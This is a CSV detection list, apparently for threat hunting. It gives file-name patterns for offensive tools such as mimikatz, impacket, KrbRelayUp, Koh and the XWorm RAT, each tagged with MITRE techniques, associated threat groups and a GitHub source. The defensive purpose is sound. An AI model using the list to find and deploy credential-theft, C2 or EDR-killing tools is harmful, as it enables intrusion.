"*\KillWindows.dll*",".{0,1000}\\KillWindows\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","16147"
"*\KillWindows.pdb*",".{0,1000}\\KillWindows\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","16148"
"*\kintercept.py*",".{0,1000}\\kintercept\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16149"
"*\Kirby.ps1*",".{0,1000}\\Kirby\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","16150"
"*\Kirby.ps1*",".{0,1000}\\Kirby\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","16151"
"*\kitten.exe*",".{0,1000}\\kitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","16152"
"*\KittyStager*",".{0,1000}\\KittyStager.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","16153"
"*\kiwidns.log*",".{0,1000}\\kiwidns\.log.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz log files","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16154"
"*\kiwifilter.log*",".{0,1000}\\kiwifilter\.log.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz log files","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16155"
"*\kiwinp.log*",".{0,1000}\\kiwinp\.log.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz log files","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16156"
"*\kiwissp.log*",".{0,1000}\\kiwissp\.log.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz log files","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16157"
"*\kiwisub.log*",".{0,1000}\\kiwisub\.log.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz log files","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16158"
"*\klg.ps1*",".{0,1000}\\klg\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","16159"
"*\knowsmore.py*",".{0,1000}\\knowsmore\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","16160"
"*\Koh.exe*",".{0,1000}\\Koh\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","16161"
"*\Koh.pdb*",".{0,1000}\\Koh\.pdb.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","16162"
"*\Koh\Koh.*",".{0,1000}\\Koh\\Koh\..{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","16163"
"*\Koppeling.sln*",".{0,1000}\\Koppeling\.sln.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","16164"
"*\KPortScan 3.0\*",".{0,1000}\\KPortScan\s3\.0\\.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","16165"
"*\KPortScan\*",".{0,1000}\\KPortScan\\.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","16166"
"*\kratserver.exe*",".{0,1000}\\kratserver\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16167"
"*\kratserver.vshost.exe*",".{0,1000}\\kratserver\.vshost\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16168"
"*\krb5\*.py",".{0,1000}\\krb5\\.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16169"
"*\KrbRelay.exe*",".{0,1000}\\KrbRelay\.exe.{0,1000}","offensive_tool_keyword","KrbRelay","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16170"
"*\KrbRelay.exe*",".{0,1000}\\KrbRelay\.exe.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","16171"
"*\KrbRelay.exe*",".{0,1000}\\KrbRelay\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","16172"
"*\KrbRelay.exe*",".{0,1000}\\KrbRelay\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16173"
"*\KrbRelay.exe*",".{0,1000}\\KrbRelay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16174"
"*\KrbRelay-SMBServer.sln*",".{0,1000}\\KrbRelay\-SMBServer\.sln.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","16175"
"*\KrbRelayUp.exe*",".{0,1000}\\KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Back Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16176"
"*\KrbRelayUp.exe*",".{0,1000}\\KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","16177"
"*\KrbRelayUp.exe*",".{0,1000}\\KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16178"
"*\KrbRelayUp.exe*",".{0,1000}\\KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16179"
"*\KrbRelayUp.lib*",".{0,1000}\\KrbRelayUp\.lib.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","16180"
"*\KrbSCM.cs*",".{0,1000}\\KrbSCM\.cs.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","16181"
"*\krbtgtAccounts.json*",".{0,1000}\\krbtgtAccounts\.json.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","16182"
"*\KRBUACBypass*",".{0,1000}\\KRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","16183"
"*\Krueger.exe*",".{0,1000}\\Krueger\.exe.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","16184"
